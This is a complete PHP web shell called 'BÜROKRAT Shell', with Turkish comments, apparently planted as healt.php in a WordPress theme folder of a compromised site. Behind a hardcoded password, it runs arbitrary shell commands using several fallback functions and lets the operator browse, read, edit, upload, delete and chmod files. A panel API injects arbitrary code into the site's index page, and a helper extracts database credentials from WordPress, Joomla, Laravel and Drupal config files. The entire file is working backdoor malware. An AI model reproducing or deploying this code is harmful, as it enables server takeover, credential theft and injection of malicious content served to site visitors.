File: /home/u176630765/domains/ringroadhonda.com/public_html/wp-content/themes/starter-starter/healt.php
<?php
session_start();
error_reporting(0);
$SHELL_PASSWORD = '_11211-Q321_CYB!+_';
// === İNDİRME (session kontrolü öncesi) ===
if (isset($_GET['do']) && $_GET['do'] === 'download' && isset($_GET['f'])) {
if (!isset($_SESSION['shell_auth'])) die('Yetkisiz');
$f = realpath($_GET['f']);
if ($f && is_file($f) && is_readable($f)) {
if (ob_get_level()) ob_end_clean();
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($f) . '"');
header('Content-Length: ' . filesize($f));
readfile($f);
exit;
}
die('Dosya okunamadı');
}
// === GİRİŞ KONTROLÜ ===
if (!empty($SHELL_PASSWORD) && !isset($_SESSION['shell_auth'])) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['pass'])) {
if ($_POST['pass'] === $SHELL_PASSWORD) {
$_SESSION['shell_auth'] = true;
} else {
$login_error = 'Hatalı şifre';
}
}
if (!isset($_SESSION['shell_auth'])) {
?><!DOCTYPE html>
<html><head><meta charset="UTF-8"><title>Giriş</title>
<style>body{font-family:monospace;background:#fff;display:flex;justify-content:center;align-items:center;height:100vh;margin:0}
form{border:1px solid #999;padding:20px;width:300px}input[type=password]{width:100%;padding:5px;margin:8px 0;border:1px solid #999;font-family:monospace;box-sizing:border-box}
input[type=submit]{padding:5px 15px;border:1px solid #999;background:#eee;cursor:pointer;font-family:monospace}.err{color:red;font-size:12px}</style>
</head><body><form method="POST"><b>Şifre:</b><br>
<input type="password" name="pass" autofocus>
<input type="submit" value="Giriş">
<?php if(isset($login_error)) echo '<p class="err">'.$login_error.'</p>'; ?>
</form></body></html><?php
exit;
}
}
// === Panel API (HackLink Panel entegrasyonu) ===
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
$pw = $_POST['password'] ?? '';
if (!empty($SHELL_PASSWORD) && $pw !== $SHELL_PASSWORD) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Geçersiz şifre']);
exit;
}
if ($cmd === 'ping') {
header('Content-Type: application/json');
echo json_encode(['status' => 'success', 'message' => 'pong', 'server' => php_uname()]);
exit;
}
if (in_array($cmd, ['inject_footer','inject_header','inject_footer_js','inject_header_js','clean_inject'])) {
$code = $_POST['code'] ?? '';
if (empty($code)) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Kod boş']);
exit;
}
$doc_root = $_SERVER['DOCUMENT_ROOT'] ?: dirname(__FILE__);
$index_files = ['index.php','index.html','index.htm'];
$target = '';
foreach ($index_files as $f) {
$p = $doc_root . '/' . $f;
if (file_exists($p) && is_writable($p)) { $target = $p; break; }
}
if (!$target) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Yazılabilir index dosyası bulunamadı']);
exit;
}
$content = file_get_contents($target);
$is_header = strpos($cmd, 'header') !== false;
if ($is_header) {
$content = preg_replace('/(<head[^>]*>)/i', '$1' . "\n" . $code, $content, 1);
} else {
if (stripos($content, '</body>') !== false) {
$content = str_ireplace('</body>', $code . "\n</body>", $content);
} else {
$content .= "\n" . $code;
}
}
file_put_contents($target, $content);
$rel = str_replace($doc_root, '', $target);
$proto = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$host = $_SERVER['HTTP_HOST'] ?? '';
header('Content-Type: application/json');
echo json_encode([
'status' => 'success',
'message' => 'Enjeksiyon başarılı',
'relative_path' => $rel,
'full_url' => $proto . '://' . $host . '/' . ltrim($rel, '/')
]);
exit;
}
// === Uzak Komut Çalıştırma (exec) ===
if ($cmd === 'exec') {
$command = isset($_POST['command']) ? $_POST['command'] : '';
if (empty($command)) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Komut boş']);
exit;
}
$dir = isset($_POST['dir']) ? $_POST['dir'] : getcwd();
$full = 'cd ' . escapeshellarg($dir) . ' && ' . $command . ' 2>&1';
$output = @shell_exec($full);
if ($output === null) {
// shell_exec kapalıysa diğer yöntemleri dene
$out_arr = [];
@exec($full, $out_arr);
$output = implode("\n", $out_arr);
if ($output === '') {
ob_start();
@system($full);
$output = ob_get_clean();
}
if ($output === '' || $output === false) {
$fp = @popen($full, 'r');
if ($fp) {
$output = '';
while (!feof($fp)) $output .= fread($fp, 8192);
pclose($fp);
}
}
if ($output === '' || $output === false) {
$desc = [1 => ['pipe','w'], 2 => ['pipe','w']];
$p = @proc_open($command, $desc, $pipes, $dir);
if (is_resource($p)) {
$output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
fclose($pipes[1]); fclose($pipes[2]);
proc_close($p);
}
}
if ($output === '' || $output === false || $output === null) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Komut çalıştırılamadı (tüm yöntemler başarısız)']);
exit;
}
}
header('Content-Type: application/json');
echo json_encode(['status' => 'success', 'output' => $output]);
exit;
}
// === Dosya Yazma (write_file) ===
if ($cmd === 'write_file') {
$path = isset($_POST['path']) ? $_POST['path'] : '';
$content = isset($_POST['content']) ? $_POST['content'] : '';
if (empty($path)) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Dosya yolu boş']);
exit;
}
$r = @file_put_contents($path, $content);
header('Content-Type: application/json');
if ($r !== false) {
echo json_encode(['status' => 'success', 'message' => 'Yazıldı', 'bytes' => $r]);
} else {
echo json_encode(['status' => 'error', 'message' => 'Yazılamadı']);
}
exit;
}
// === Dosya Okuma (read_file) ===
if ($cmd === 'read_file') {
$path = isset($_POST['path']) ? $_POST['path'] : '';
if (empty($path) || !file_exists($path)) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Dosya bulunamadı']);
exit;
}
header('Content-Type: application/json');
echo json_encode(['status' => 'success', 'content' => file_get_contents($path)]);
exit;
}
// === Sunucu Bilgisi (info) ===
if ($cmd === 'info') {
$disabled = str_replace(' ', '', ini_get('disable_functions'));
$exec_fns = [];
foreach (['exec','shell_exec','system','passthru','popen','proc_open'] as $fn) {
$exec_fns[$fn] = function_exists($fn) && !in_array($fn, explode(',', strtolower($disabled)));
}
header('Content-Type: application/json');
echo json_encode([
'status' => 'success',
'php_version' => phpversion(),
'sapi' => php_sapi_name(),
'os' => PHP_OS,
'uname' => php_uname(),
'user' => get_current_user(),
'cwd' => getcwd(),
'doc_root' => $_SERVER['DOCUMENT_ROOT'] ?? '',
'disable_functions' => $disabled,
'exec_functions' => $exec_fns,
'extensions' => [
'FFI' => class_exists('FFI'),
'Imagick' => class_exists('Imagick'),
'curl' => extension_loaded('curl'),
'imap' => extension_loaded('imap'),
],
'tmp_writable' => is_writable('/tmp'),
'webdir_writable' => is_writable(dirname(__FILE__)),
'open_basedir' => ini_get('open_basedir'),
]);
exit;
}
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Bilinmeyen komut']);
exit;
}
// === YARDIMCI FONKSİYONLAR ===
function get_dir() {
if (isset($_GET['dir'])) {
$d = realpath($_GET['dir']);
if ($d && is_dir($d)) return $d;
}
return getcwd();
}
function fmt_size($bytes) {
if ($bytes >= 1073741824) return round($bytes / 1073741824, 2) . ' GB';
if ($bytes >= 1048576) return round($bytes / 1048576, 2) . ' MB';
if ($bytes >= 1024) return round($bytes / 1024, 2) . ' KB';
return $bytes . ' B';
}
function fmt_perms($file) {
$p = fileperms($file);
$s = '';
$s .= (($p & 0x0100) ? 'r' : '-');
$s .= (($p & 0x0080) ? 'w' : '-');
$s .= (($p & 0x0040) ? 'x' : '-');
$s .= (($p & 0x0020) ? 'r' : '-');
$s .= (($p & 0x0010) ? 'w' : '-');
$s .= (($p & 0x0008) ? 'x' : '-');
$s .= (($p & 0x0004) ? 'r' : '-');
$s .= (($p & 0x0002) ? 'w' : '-');
$s .= (($p & 0x0001) ? 'x' : '-');
return $s;
}
function check_tool($name) {
$check = @shell_exec('which ' . $name . ' 2>/dev/null');
return !empty(trim($check ?? ''));
}
function check_mysql() {
if (function_exists('mysqli_connect') || function_exists('mysql_connect') || class_exists('PDO')) return true;
return false;
}
function extract_credentials($content, $cms) {
$creds = ['host' => '', 'name' => '', 'user' => '', 'pass' => ''];
$found = false;
// WordPress (wp-config.php)
if (preg_match("/DB_HOST['\"]\\s*,\\s*['\"](.+?)['\"]/", $content, $m)) { $creds['host'] = $m[1]; $found = true; }
if (preg_match("/DB_NAME['\"]\\s*,\\s*['\"](.+?)['\"]/", $content, $m)) { $creds['name'] = $m[1]; $found = true; }
if (preg_match("/DB_USER['\"]\\s*,\\s*['\"](.+?)['\"]/", $content, $m)) { $creds['user'] = $m[1]; $found = true; }
if (preg_match("/DB_PASSWORD['\"]\\s*,\\s*['\"](.*)['\"]/", $content, $m)) { $creds['pass'] = $m[1]; $found = true; }
// Joomla (configuration.php)
if (!$found || empty($creds['name'])) {
if (preg_match('/\$host\s*=\s*[\'"](.+?)[\'"]/', $content, $m)) { $creds['host'] = $m[1]; $found = true; }
if (preg_match('/\$db\s*=\s*[\'"](.+?)[\'"]/', $content, $m)) { $creds['name'] = $m[1]; $found = true; }
if (preg_match('/\$user\s*=\s*[\'"](.+?)[\'"]/', $content, $m)) { $creds['user'] = $m[1]; $found = true; }
if (preg_match('/\$password\s*=\s*[\'"](.*?)[\'"]/', $content, $m)) { $creds['pass'] = $m[1]; $found = true; }
}
// Laravel .env
if (!$found || empty($creds['name'])) {
if (preg_match('/DB_HOST=(.+)/', $content, $m)) { $creds['host'] = trim($m[1]); $found = true; }
if (preg_match('/DB_DATABASE=(.+)/', $content, $m)) { $creds['name'] = trim($m[1]); $found = true; }
if (preg_match('/DB_USERNAME=(.+)/', $content, $m)) { $creds['user'] = trim($m[1]); $found = true; }
if (preg_match('/DB_PASSWORD=(.*)/', $content, $m)) { $creds['pass'] = trim($m[1]); $found = true; }
}
// Drupal (settings.php) - 'database', 'username', 'password', 'host'
if (!$found || empty($creds['name'])) {
if (preg_match("/['\"]database['\"]\\s*=>\\s*['\"](.+?)['\"]/", $content, $m)) { $creds['name'] = $m[1]; $found = true; }
if (preg_match("/['\"]username['\"]\\s*=>\\s*['\"](.+?)['\"]/", $content, $m)) { $creds['user'] = $m[1]; $found = true; }
if (preg_match("/['\"]password['\"]\\s*=>\\s*['\"](.*?)['\"]/", $content, $m)) { $creds['pass'] = $m[1]; $found = true; }
if (preg_match("/['\"]host['\"]\\s*=>\\s*['\"](.+?)['\"]/", $content, $m)) { $creds['host'] = $m[1]; $found = true; }
}
return $found ? $creds : [];
}
$dir = get_dir();
$self = basename(__FILE__);
$msg = '';
$msg_type = '';
// === İŞLEMLER ===
$do = $_GET['do'] ?? $_POST['do'] ?? '';
// Çıkış
if ($do === 'logout') {
session_destroy();
header('Location: ' . $self);
exit;
}
// Yeni dosya
if ($do === 'newfile' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$name = trim($_POST['name'] ?? '');
if ($name) {
$path = $dir . '/' . $name;
if (file_exists($path)) {
$msg = 'Bu isimde dosya zaten var'; $msg_type = 'err';
} else {
if (@file_put_contents($path, '') !== false) {
$msg = 'Dosya oluşturuldu: ' . $name; $msg_type = 'ok';
} else {
$msg = 'Dosya oluşturulamadı'; $msg_type = 'err';
}
}
}
}
// Yeni klasör
if ($do === 'newfolder' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$name = trim($_POST['name'] ?? '');
if ($name) {
$path = $dir . '/' . $name;
if (file_exists($path)) {
$msg = 'Bu isimde klasör zaten var'; $msg_type = 'err';
} else {
if (@mkdir($path, 0755)) {
$msg = 'Klasör oluşturuldu: ' . $name; $msg_type = 'ok';
} else {
$msg = 'Klasör oluşturulamadı'; $msg_type = 'err';
}
}
}
}
// Silme
if ($do === 'delete' && isset($_GET['f'])) {
$f = realpath($_GET['f']);
if ($f) {
if (is_dir($f)) {
// Klasör silme (boş klasör)
if (@rmdir($f)) {
$msg = 'Klasör silindi: ' . basename($f); $msg_type = 'ok';
} else {
// Dolu klasör için recursive silme
function rm_rf($d) {
$items = array_diff(scandir($d), ['.','..']);
foreach ($items as $item) {
$path = $d . '/' . $item;
is_dir($path) ? rm_rf($path) : @unlink($path);
}
return @rmdir($d);
}
if (rm_rf($f)) {
$msg = 'Klasör silindi: ' . basename($f); $msg_type = 'ok';
} else {
$msg = 'Klasör silinemedi'; $msg_type = 'err';
}
}
} else {
if (@unlink($f)) {
$msg = 'Dosya silindi: ' . basename($f); $msg_type = 'ok';
} else {
$msg = 'Dosya silinemedi'; $msg_type = 'err';
}
}
}
}
// Yeniden adlandırma
if ($do === 'rename' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$old = $_POST['old'] ?? '';
$new_name = trim($_POST['new_name'] ?? '');
if ($old && $new_name) {
$old = realpath($old);
if ($old) {
$new_path = dirname($old) . '/' . $new_name;
if (file_exists($new_path)) {
$msg = 'Bu isimde dosya/klasör zaten var'; $msg_type = 'err';
} else {
if (@rename($old, $new_path)) {
$msg = 'Yeniden adlandırıldı: ' . $new_name; $msg_type = 'ok';
} else {
$msg = 'Yeniden adlandırılamadı'; $msg_type = 'err';
}
}
}
}
}
// Chmod
if ($do === 'chmod' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$f = $_POST['file'] ?? '';
$perm = $_POST['perm'] ?? '';
if ($f && $perm) {
$f = realpath($f);
if ($f) {
$oct = octdec($perm);
if (@chmod($f, $oct)) {
$msg = 'İzin değiştirildi: ' . $perm; $msg_type = 'ok';
} else {
$msg = 'İzin değiştirilemedi'; $msg_type = 'err';
}
}
}
}
// Dosya düzenleme kaydet
if ($do === 'saveedit' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$f = $_POST['file'] ?? '';
$content = $_POST['content'] ?? '';
if ($f) {
$f = realpath($f);
if ($f) {
if (@file_put_contents($f, $content) !== false) {
$msg = 'Dosya kaydedildi: ' . basename($f); $msg_type = 'ok';
} else {
$msg = 'Dosya kaydedilemedi'; $msg_type = 'err';
}
}
}
}
// Dosya yükleme
if ($do === 'upload' && $_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_FILES['upload_file']) && $_FILES['upload_file']['error'] === UPLOAD_ERR_OK) {
$upload_name = basename($_FILES['upload_file']['name']);
$upload_dest = $dir . '/' . $upload_name;
if (file_exists($upload_dest)) {
$msg = 'Bu isimde dosya zaten var: ' . $upload_name; $msg_type = 'err';
} else {
if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $upload_dest)) {
$msg = 'Dosya yüklendi: ' . $upload_name . ' (' . fmt_size(filesize($upload_dest)) . ')'; $msg_type = 'ok';
} else {
$msg = 'Dosya yüklenemedi'; $msg_type = 'err';
}
}
} elseif (isset($_FILES['upload_file'])) {
$err_codes = [1=>'Dosya çok büyük (php.ini)',2=>'Dosya çok büyük (form)',3=>'Kısmen yüklendi',4=>'Dosya seçilmedi',6=>'Geçici klasör yok',7=>'Diske yazılamadı'];
$msg = 'Yükleme hatası: ' . ($err_codes[$_FILES['upload_file']['error']] ?? 'Bilinmeyen hata'); $msg_type = 'err';
}
}
// Terminal komutu çalıştırma
$terminal_output = '';
if ($do === 'terminal' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$tcmd = $_POST['tcmd'] ?? '';
if ($tcmd) {
$full_cmd = 'cd ' . escapeshellarg($dir) . ' && ' . $tcmd . ' 2>&1';
$terminal_output = @shell_exec($full_cmd);
if ($terminal_output === null) $terminal_output = 'Komut çalıştırılamadı (shell_exec devre dışı olabilir)';
}
}
// === SUNUCU BİLGİLERİ ===
$server_ip = $_SERVER['SERVER_ADDR'] ?? gethostbyname(gethostname());
$your_ip = $_SERVER['REMOTE_ADDR'] ?? '?';
$web_server = $_SERVER['SERVER_SOFTWARE'] ?? '?';
$system = php_uname();
$user_info = function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid()) : null;
$user_name = $user_info ? $user_info['name'] : get_current_user();
$user_uid = $user_info ? $user_info['uid'] : (function_exists('posix_geteuid') ? posix_geteuid() : '?');
$php_ver = phpversion();
$disabled = ini_get('disable_functions') ?: 'Yok';
?><!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title><?php echo htmlspecialchars($dir); ?></title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{font-family:monospace;font-size:13px;background:#fff;color:#000;padding:10px}
a{color:#00c;text-decoration:none}a:hover{text-decoration:underline}
table{width:100%;border-collapse:collapse;margin:8px 0}
th,td{border:1px solid #ccc;padding:4px 8px;text-align:left}
th{background:#eee;font-weight:bold}
tr:hover{background:#f5f5f5}
input[type=text],input[type=password],textarea,select{border:1px solid #999;padding:3px 5px;font-family:monospace;font-size:13px}
input[type=submit],button{border:1px solid #999;background:#eee;padding:3px 10px;cursor:pointer;font-family:monospace;font-size:13px}
input[type=submit]:hover,button:hover{background:#ddd}
.info-box{border:1px solid #ccc;padding:8px;margin-bottom:10px;background:#fafafa;word-break:break-all;line-height:1.8}
.path-box{border:1px solid #ccc;padding:6px 8px;margin-bottom:10px;background:#f5f5f5;word-break:break-all}
.msg-ok{border:1px solid #090;background:#dfd;padding:6px 8px;margin-bottom:10px}
.msg-err{border:1px solid #900;background:#fdd;padding:6px 8px;margin-bottom:10px}
.tools{margin-bottom:10px;padding:6px 0;border-bottom:1px solid #ccc}
.tools form{display:inline-block;margin-right:10px;margin-bottom:4px}
.terminal-box{border:1px solid #ccc;padding:8px;margin-bottom:10px;background:#fafafa}
.terminal-output{background:#111;color:#0f0;padding:10px;font-family:monospace;white-space:pre-wrap;word-break:break-all;max-height:400px;overflow-y:auto;margin-top:6px}
.top-bar{display:flex;justify-content:space-between;align-items:center;margin-bottom:10px;padding-bottom:6px;border-bottom:1px solid #ccc}
.dir-link{margin-right:3px}
</style>
</head>
<body>
<div class="top-bar">
<div><b>BÜROKRAT Shell</b></div>
<a href="?do=logout">[Çıkış]</a>
</div>
<!-- SUNUCU BİLGİLERİ -->
<div class="info-box">
<b>Server IP:</b> <?php echo htmlspecialchars($server_ip); ?> | <b>Your IP:</b> <?php echo htmlspecialchars($your_ip); ?><br>
<b>Web Server:</b> <?php echo htmlspecialchars($web_server); ?><br>
<b>System:</b> <?php echo htmlspecialchars($system); ?><br>
<b>User:</b> <?php echo htmlspecialchars($user_name); ?> (<?php echo htmlspecialchars($user_uid); ?>)<br>
<b>PHP Version:</b> <?php echo htmlspecialchars($php_ver); ?><br>
<b>Disable Function:</b> <?php echo htmlspecialchars($disabled); ?><br>
<b>MySQL:</b> <?php echo check_mysql() ? 'ON' : 'OFF'; ?> |
<b>cURL:</b> <?php echo function_exists('curl_init') ? 'ON' : 'OFF'; ?> |
<b>WGET:</b> <?php echo check_tool('wget') ? 'ON' : 'OFF'; ?> |
<b>Perl:</b> <?php echo check_tool('perl') ? 'ON' : 'OFF'; ?> |
<b>Python:</b> <?php echo (check_tool('python3') || check_tool('python')) ? 'ON' : 'OFF'; ?> |
<b>Sudo:</b> <?php echo check_tool('sudo') ? 'ON' : 'OFF'; ?> |
<b>Pkexec:</b> <?php echo check_tool('pkexec') ? 'ON' : 'OFF'; ?>
</div>
<?php if ($msg): ?>
<div class="msg-<?php echo $msg_type; ?>"><?php echo htmlspecialchars($msg); ?></div>
<?php endif; ?>
<?php
// === DOSYA DÜZENLEME EKRANI ===
if ($do === 'edit' && isset($_GET['f'])):
$ef = realpath($_GET['f']);
if ($ef && is_file($ef)):
$econtent = @file_get_contents($ef);
?>
<div style="margin-bottom:10px">
<b>Düzenle:</b> <?php echo htmlspecialchars($ef); ?>
| <a href="?dir=<?php echo urlencode($dir); ?>">[Geri]</a>
</div>
<form method="POST" action="?do=saveedit&dir=<?php echo urlencode($dir); ?>">
<input type="hidden" name="do" value="saveedit">
<input type="hidden" name="file" value="<?php echo htmlspecialchars($ef); ?>">
<textarea name="content" style="width:100%;height:500px"><?php echo htmlspecialchars($econtent); ?></textarea><br>
<input type="submit" value="Kaydet" style="margin-top:6px">
<a href="?dir=<?php echo urlencode($dir); ?>" style="margin-left:10px">[İptal]</a>
</form>
<?php
else:
echo '<div class="msg-err">Dosya okunamadı</div>';
endif;
// === RENAME EKRANI ===
elseif ($do === 'renameform' && isset($_GET['f'])):
$rf = realpath($_GET['f']);
if ($rf):
?>
<div style="margin-bottom:10px">
<b>Yeniden Adlandır:</b> <?php echo htmlspecialchars($rf); ?>
| <a href="?dir=<?php echo urlencode($dir); ?>">[Geri]</a>
</div>
<form method="POST" action="?do=rename&dir=<?php echo urlencode($dir); ?>">
<input type="hidden" name="do" value="rename">
<input type="hidden" name="old" value="<?php echo htmlspecialchars($rf); ?>">
Yeni ad: <input type="text" name="new_name" value="<?php echo htmlspecialchars(basename($rf)); ?>" size="40">
<input type="submit" value="Kaydet">
</form>
<?php
endif;
// === CHMOD EKRANI ===
elseif ($do === 'chmodform' && isset($_GET['f'])):
$cf = realpath($_GET['f']);
if ($cf):
$cur_perm = substr(sprintf('%o', fileperms($cf)), -4);
?>
<div style="margin-bottom:10px">
<b>İzin Değiştir:</b> <?php echo htmlspecialchars($cf); ?>
| <a href="?dir=<?php echo urlencode($dir); ?>">[Geri]</a>
</div>
<form method="POST" action="?do=chmod&dir=<?php echo urlencode($dir); ?>">
<input type="hidden" name="do" value="chmod">
<input type="hidden" name="file" value="<?php echo htmlspecialchars($cf); ?>">
İzin (örn: 0755): <input type="text" name="perm" value="<?php echo $cur_perm; ?>" size="6">
<input type="submit" value="Uygula">
</form>
<?php
endif;
// === ANA DOSYA YÖNETİCİSİ ===
else:
?>
<!-- DİZİN YOLU -->
<div class="path-box">
<b>Dizin:</b>
<?php
$parts = explode('/', str_replace('\\', '/', $dir));
$built = '';
foreach ($parts as $i => $part) {
if ($part === '' && $i === 0) {
$built = '/';
echo '<a class="dir-link" href="?dir=' . urlencode('/') . '">/</a>';
continue;
}
if ($part === '') continue;
$built = rtrim($built, '/') . '/' . $part;
echo '<a class="dir-link" href="?dir=' . urlencode($built) . '">' . htmlspecialchars($part) . '</a>/';
}
?>
</div>
<!-- ARAÇ ÇUBUĞU -->
<div class="tools">
<form method="POST" action="?do=newfile&dir=<?php echo urlencode($dir); ?>">
<input type="hidden" name="do" value="newfile">
<input type="text" name="name" placeholder="dosya_adi.txt" size="20">
<input type="submit" value="Yeni Dosya">
</form>
<form method="POST" action="?do=newfolder&dir=<?php echo urlencode($dir); ?>">
<input type="hidden" name="do" value="newfolder">
<input type="text" name="name" placeholder="klasor_adi" size="20">
<input type="submit" value="Yeni Klasör">
</form>
<form method="POST" action="?do=upload&dir=<?php echo urlencode($dir); ?>" enctype="multipart/form-data">
<input type="hidden" name="do" value="upload">
<input type="file" name="upload_file" style="font-family:monospace;font-size:13px">
<input type="submit" value="Yükle">
</form>
</div>
<!-- TERMİNAL -->
<div class="terminal-box">
<form method="POST" action="?do=terminal&dir=<?php echo urlencode($dir); ?>">
<input type="hidden" name="do" value="terminal">
<b>Terminal:</b>
<input type="text" name="tcmd" placeholder="komut girin..." size="60" value="<?php echo htmlspecialchars($_POST['tcmd'] ?? ''); ?>" autofocus>
<input type="submit" value="Çalıştır">
</form>
<?php if ($terminal_output !== ''): ?>
<div class="terminal-output"><?php echo htmlspecialchars($terminal_output); ?></div>
<?php endif; ?>
</div>
<!-- DOSYA LİSTESİ -->
<table>
<tr>
<th>Ad</th>
<th>Boyut</th>
<th>İzin</th>
<th>Değiştirilme</th>
<th>İşlem</th>
</tr>
<?php
// Üst dizin
$parent = dirname($dir);
if ($parent !== $dir):
?>
<tr>
<td><a href="?dir=<?php echo urlencode($parent); ?>">[..]</a></td>
<td>-</td><td>-</td><td>-</td><td>-</td>
</tr>
<?php endif; ?>
<?php
$items = @scandir($dir);
if ($items === false) $items = [];
// Önce klasörler, sonra dosyalar
$dirs = [];
$files = [];
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$full = $dir . '/' . $item;
if (is_dir($full)) $dirs[] = $item;
else $files[] = $item;
}
sort($dirs, SORT_STRING | SORT_FLAG_CASE);
sort($files, SORT_STRING | SORT_FLAG_CASE);
foreach ($dirs as $item):
$full = $dir . '/' . $item;
?>
<tr>
<td><b><a href="?dir=<?php echo urlencode($full); ?>">[<?php echo htmlspecialchars($item); ?>]</a></b></td>
<td>-</td>
<td><?php echo fmt_perms($full); ?></td>
<td><?php echo date('Y-m-d H:i', @filemtime($full)); ?></td>
<td>
<a href="?do=renameform&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>">Rename</a>
<a href="?do=chmodform&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>">Chmod</a>
<a href="?do=delete&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>" onclick="return confirm('Bu klasörü silmek istediğinize emin misiniz?')">Delete</a>
</td>
</tr>
<?php endforeach; ?>
<?php foreach ($files as $item):
$full = $dir . '/' . $item;
?>
<tr>
<td><?php echo htmlspecialchars($item); ?></td>
<td><?php echo fmt_size(@filesize($full)); ?></td>
<td><?php echo fmt_perms($full); ?></td>
<td><?php echo date('Y-m-d H:i', @filemtime($full)); ?></td>
<td>
<a href="?do=download&f=<?php echo urlencode($full); ?>">Download</a>
<a href="?do=edit&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>">Edit</a>
<a href="?do=renameform&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>">Rename</a>
<a href="?do=chmodform&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>">Chmod</a>
<a href="?do=delete&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>" onclick="return confirm('Bu dosyayı silmek istediğinize emin misiniz?')">Delete</a>
</td>
</tr>
<?php endforeach; ?>
</table>
<?php endif; ?>
</body>
</html>